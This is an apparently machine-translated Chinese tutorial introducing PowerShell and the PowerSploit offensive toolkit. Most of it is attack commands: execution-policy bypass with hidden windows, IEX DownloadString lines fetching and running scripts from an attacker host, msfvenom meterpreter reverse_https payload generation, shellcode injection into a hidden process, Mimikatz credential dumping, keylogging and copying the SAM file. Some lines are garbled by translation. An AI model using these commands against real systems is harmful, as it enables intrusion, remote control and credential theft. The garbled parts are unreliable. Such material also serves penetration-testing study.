本文《Powershell & Powersploit 入门》由军队0队提交安全脉冲,并公布了安全脉冲。如果您需要转载,请先联系安全脉冲授权;请不要擅自转载。 PowerShell是一个命令行脚本环境,可以自动执行在Windows上运行的系统和应用程序管理。您可以将其视为命令行提示符cmd.exe或subversion的扩展。 Powershell需要支持.NET环境并支持.NET对象。可读,易于使用,可以是所有当前shell中的第一个。
目前有四个版本的PowerShell,分别为1.0,2.0,3.0和4.0。
关于安全脉冲的Powershell有很多文章,请看这里:https://www.com/archives/tag/powershell PowerShell简介
PowerShell脚本 *本地权限绕过执行PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1 *本地隐藏权限绕过执行脚本PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive-NoProfile -WindowStyle Hidden -File xxx.ps1 从对等方接收数据时失败 * Recon使用目标主机作为内部网信息检测的跳板 ## Powersploit 模块应用程序 Invoke-Shellcode此模块可与MSF结合使用以获得意外结果,此处未对此进行介绍。 首先在目标主机上安装“Invoke-Shellcode”脚本。使用Get-Help +脚本名称查看如何使用它: 命令格式: IEX(New-Object Net.WebClient).DownloadString('http://IP Adress/CodeExecutio N /调用 - Shellcode.ps1' )
一:使用MSF中的reverse_https模块进行反弹,设置如下
最初在Invoke-Shellcode中使用以下命令来弹跳: Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.146.129 -Lport 4444 -Force 但是Powersploit更新到3.0, Invoke-Shellcode脚本没有Lhost和Lport参数,所以我们需要使用另一种方法来实现。 使用msfvenom生成powershell脚本。 Msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.110.129 LPORT=4444 -f powershell -o/var/www/html/test
IEX(New-Object Net.WebClient).DownloadString('http://192.168.110.129/CodeExecution/Invoke-Shellcode.ps1') IEX(New-Object Net.WebClient).DownloadString('http://192.168.110.129/test') Invoke-Shellcode -Shellcode($ buf)
二:过程注入 首先创建一个隐藏进程: 启动过程 c: \ windows \ system32 \ notepad.exe -WindowStyle隐藏 使用Get-Process命令查看当前进程,记住刚刚创建的隐藏进程ID。
然后使用Invoke-Shellcode脚本进行进程注入 Invoke-Shellcode -ProcessID 2384 -Shellcode($ buf)
如果您的Powersploit是2.2版,则可以直接使用以下命令。 从对等方接收数据时失败 Invoke-Portscan -Hosts< IP Adress/Rangr> -Ports
Invoke-Mimikatz DUMP密码(请注意,此脚本需要以管理员权限运行) Invoke-Mimikatz - DumpCreds也可以直接运行
Get-Keystrokes Keylogger Get-Keystrokes -LogPath +<保存位置>
Invoke-NinjaCopy Universal Copy Invoke-NinjaCopy -Path<要复制的文件> -LocalDestination<复制文件保存位置> 在windows主机上有一个数据库SAM文件,数据中有很多有价值的信息,普通的COPY命令无法复制,使用通用副本可以复制SAM文件
Invoke-ReverseDnsLookup DNS查询(似乎没用 - - !,我希望每个人都告诉我这个东西的用途是什么) Invoke-ReverseDnsLookup -IpRange< IP_Address/Range>
Get-HttpStatus 网站目录检测(似乎没用) Get-HttpStatus -Target< IP Address> +字典(如果你遇到HTTPS然后添加-UseSSL,在其他端口然后 -Port)
本文《Powershell & Powersploit 入门》由军队0队提交安全脉冲,并公布了安全脉冲。如果您需要转载,请先联系安全脉冲授权;请不要擅自转载。